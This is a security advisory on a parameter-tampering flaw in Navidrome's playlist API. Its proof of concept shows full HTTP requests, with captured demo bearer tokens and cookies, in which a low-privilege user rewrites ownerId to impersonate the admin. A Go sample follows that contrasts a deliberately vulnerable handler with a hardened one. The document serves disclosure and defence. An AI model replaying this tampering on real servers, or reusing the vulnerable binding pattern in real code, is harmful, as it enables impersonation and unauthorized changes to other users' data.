Summary
Parameter tampering is a vulnerability in which an attacker can manipulate parameter values in HTTP requests.
Details
The attacker is able to change parameter values in the request body and successfully impersonate another user. In this case, the attacker created a playlist, added a song, posted an arbitrary comment, set the playlist to public, and set the admin as the owner of the playlist.
PoC
- Login as demo user.
- Create new playlist.
- The attacker needs the owner ID of another user. In this case, it could be obtained by sending the following request:
GET /api/playlist/ HTTP/2
Host: demo.navidrome.org
Cookie: _ga_CHTWP8NRKH=GS1.2.1713446672.1.1.1713455998.0.0.0; _ga=GA1.2.593362300.1713446672; _gid=GA1.2.66650755.1713446672; X-ND-Client-Unique-Id=58d13f9c-e9a8-45b8-8df1-cd7bbdb2a252; nd-player-64656d6f=ce75e704-38c1-493e-be5f-02aed9aca54d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.navidrome.org/app/
X-Nd-Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG0iOmZhbHNlLCJleHAiOjE3MTM1NDIzOTgsImlhdCI6MTcxMzQ1MzU1OSwiaXNzIjoiTkQiLCJzdWIiOiJkZW1vIiwidWlkIjoiMzFkMmRhODMtZDJjNi00MzQ4LThhMTItZDVlN2YyYjE3MTk2In0.9ReSgp6My_6a-lT0oQhhPoMiVUE7nRFUVV8saFdUHyY
X-Nd-Client-Unique-Id: a74fc1b4-8ceb-458f-ad45-12e0aec05512
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Response:
HTTP/2 200 OK
Alt-Svc: h3=":443"; ma=2592000
Content-Type: application/json
Date: Thu, 18 Apr 2024 16:06:22 GMT
Permissions-Policy: autoplay=(), camera=(), microphone=(), usb=()
Referrer-Policy: same-origin
Server: Caddy
Set-Cookie: X-ND-Client-Unique-Id=a74fc1b4-8ceb-458f-ad45-12e0aec05512; Path=/; Max-Age=31536000; HttpOnly; Secure; SameSite=Strict
Strict-Transport-Security: max-age=31536000;
Vary: Origin
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Nd-Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG0iOmZhbHNlLCJleHAiOjE3MTM1NDI3ODIsImlhdCI6MTcxMzQ1MzU1OSwiaXNzIjoiTkQiLCJzdWIiOiJkZW1vIiwidWlkIjoiMzFkMmRhODMtZDJjNi00MzQ4LThhMTItZDVlN2YyYjE3MTk2In0.woZ7gsCxngtUP2CB_hPlNTNhnAXVr0v_SmluatGEEwg
X-Total-Count: 5
Content-Length: 1779
[{"id":"764308fd-ac10-4ff9-97c6-53d17d383b02","name":"All from Brock Berrigan","comment":"","duration":3039.66,"size":121916830,"songCount":21,**"ownerName":"admin","ownerId":"ed0330d2-4f51-4964-a356-216bdabea948"**,"public":true,"path":"","sync":false,"createdAt":"2023-03-11T18:46:04.502717517Z","updatedAt":"2023-12-28T02:21:01.317387319Z","rules":null,"evaluatedAt":"0001-01-01T00:00:00Z"},<REDACTED>
Return to the playlist you created and edit it. Change the playlist name and add a comment if desired, then submit the request.
Intercept this request and change the value of the parameter ownerId to the admin ID that you obtained as previously explained. Note: You do not need to change the ownerName value, as it will automatically update based on the ownerId. For clarity and better understanding, I changed it in the request to "admin".
PUT /api/playlist/28a84335-31f2-4757-a893-d92856e4025b HTTP/2
Host: demo.navidrome.org
Cookie: _ga_CHTWP8NRKH=GS1.2.1713446672.1.1.1713455864.0.0.0; _ga=GA1.2.593362300.1713446672; _gid=GA1.2.66650755.1713446672; X-ND-Client-Unique-Id=a0c9c415-06ed-440c-adee-7bac9e4ab90c; nd-player-64656d6f=ce75e704-38c1-493e-be5f-02aed9aca54d; _gat=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 372
Referer: https://demo.navidrome.org/app/
X-Nd-Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG0iOmZhbHNlLCJleHAiOjE3MTM1NDIyNTAsImlhdCI6MTcxMzQ1MzU1OSwiaXNzIjoiTkQiLCJzdWIiOiJkZW1vIiwidWlkIjoiMzFkMmRhODMtZDJjNi00MzQ4LThhMTItZDVlN2YyYjE3MTk2In0.hT5cDsfZUCL1vqr-Da1UXBdUgPT43j5QqOR6eDifUrs
X-Nd-Client-Unique-Id: a0c9c415-06ed-440c-adee-7bac9e4ab90c
Origin: https://demo.navidrome.org
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"id":"28a84335-31f2-4757-a893-d92856e4025b","name":"test","comment":"admin user impersonation","duration":178.77,"size":19866778,"songCount":1,**"ownerName":"admin","ownerId":"ed0330d2-4f51-4964-a356-216bdabea948**","public":true,"path":"","sync":false,"createdAt":"2024-04-18T14:48:11.249790581Z","updatedAt":"2024-04-18T15:54:28.441532761Z","rules":null,"evaluatedAt":null}
Forward the request.
The playlist named "test" is created, and the owner is now set as admin. The following request and response demonstrate the successful change of the playlist owner:
GET /api/playlist/ HTTP/2
Host: demo.navidrome.org
Cookie: _ga_CHTWP8NRKH=GS1.2.1713446672.1.1.1713455998.0.0.0; _ga=GA1.2.593362300.1713446672; _gid=GA1.2.66650755.1713446672; X-ND-Client-Unique-Id=58d13f9c-e9a8-45b8-8df1-cd7bbdb2a252; nd-player-64656d6f=ce75e704-38c1-493e-be5f-02aed9aca54d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.navidrome.org/app/
X-Nd-Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG0iOmZhbHNlLCJleHAiOjE3MTM1NDIzOTgsImlhdCI6MTcxMzQ1MzU1OSwiaXNzIjoiTkQiLCJzdWIiOiJkZW1vIiwidWlkIjoiMzFkMmRhODMtZDJjNi00MzQ4LThhMTItZDVlN2YyYjE3MTk2In0.9ReSgp6My_6a-lT0oQhhPoMiVUE7nRFUVV8saFdUHyY
X-Nd-Client-Unique-Id: a74fc1b4-8ceb-458f-ad45-12e0aec05512
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
HTTP/2 200 OK
Alt-Svc: h3=":443"; ma=2592000
Content-Type: application/json
Date: Thu, 18 Apr 2024 16:00:29 GMT
Permissions-Policy: autoplay=(), camera=(), microphone=(), usb=()
Referrer-Policy: same-origin
Server: Caddy
Set-Cookie: X-ND-Client-Unique-Id=a74fc1b4-8ceb-458f-ad45-12e0aec05512; Path=/; Max-Age=31536000; HttpOnly; Secure; SameSite=Strict
Strict-Transport-Security: max-age=31536000;
Vary: Origin
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Nd-Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG0iOmZhbHNlLCJleHAiOjE3MTM1NDI0MjksImlhdCI6MTcxMzQ1MzU1OSwiaXNzIjoiTkQiLCJzdWIiOiJkZW1vIiwidWlkIjoiMzFkMmRhODMtZDJjNi00MzQ4LThhMTItZDVlN2YyYjE3MTk2In0.SHdMgL1IvshQoqVH2_sQDBtOmNj006GRtyi2SJbsfck
X-Total-Count: 5
Content-Length: 1779
<REDACTED>
[{"id":"28a84335-31f2-4757-a893-d92856e4025b","name":"test","comment":"admin user impersonation","duration":178.77,"size":19866778,"songCount":1,**"ownerName":"admin"**,"**ownerId":"ed0330d2-4f51-4964-a356-216bdabea948**","public":true,"path":"","sync":false,"createdAt":"2024-04-18T14:48:11.249790581Z","updatedAt":"2024-04-18T15:58:18.144780493Z","rules":null,"evaluatedAt":null},<REDACTED>
Impact
Each known user is impacted. An attacker can obtain the ownerId from shared playlist information, meaning every user who has shared a playlist is also impacted, as they can be impersonated.
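As an added example (not code from the Navidrome project) showing the pattern behind this report in Go: a handler that binds the request body straight over the stored record accepts a client-supplied ownerId, while the hardened form takes the caller's identity from the authenticated session, checks ownership before writing, and allow-lists the mutable fields. The Playlist type, function names and IDs are hypothetical.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// Playlist is a simplified record constructed for this example (not Navidrome's own model).
type Playlist struct {
	ID      string `json:"id"`
	Name    string `json:"name"`
	OwnerID string `json:"ownerId"`
	Public  bool   `json:"public"`
}

var ErrForbidden = errors.New("caller does not own this playlist")

// updateVulnerable decodes the body straight over the stored record, so a client-supplied ownerId silently replaces the real owner.
func updateVulnerable(stored *Playlist, body []byte) error {
	return json.Unmarshal(body, stored)
}

// playlistPatch allow-lists the fields a client may change; ownerId is
// deliberately absent, so it can never be set from the request body.
type playlistPatch struct {
	Name   *string `json:"name"`
	Public *bool   `json:"public"`
}

// updateHardened takes the caller's identity from the authenticated session
// (never from the body), refuses updates by non-owners, and copies only the
// allow-listed fields, so a tampered ownerId is ignored rather than honoured.
func updateHardened(callerUID string, stored *Playlist, body []byte) error {
	if stored.OwnerID != callerUID {
		return ErrForbidden
	}
	var p playlistPatch
	if err := json.Unmarshal(body, &p); err != nil {
		return fmt.Errorf("invalid body: %w", err)
	}
	if p.Name != nil {
		stored.Name = *p.Name
	}
	if p.Public != nil {
		stored.Public = *p.Public
	}
	return nil
}
```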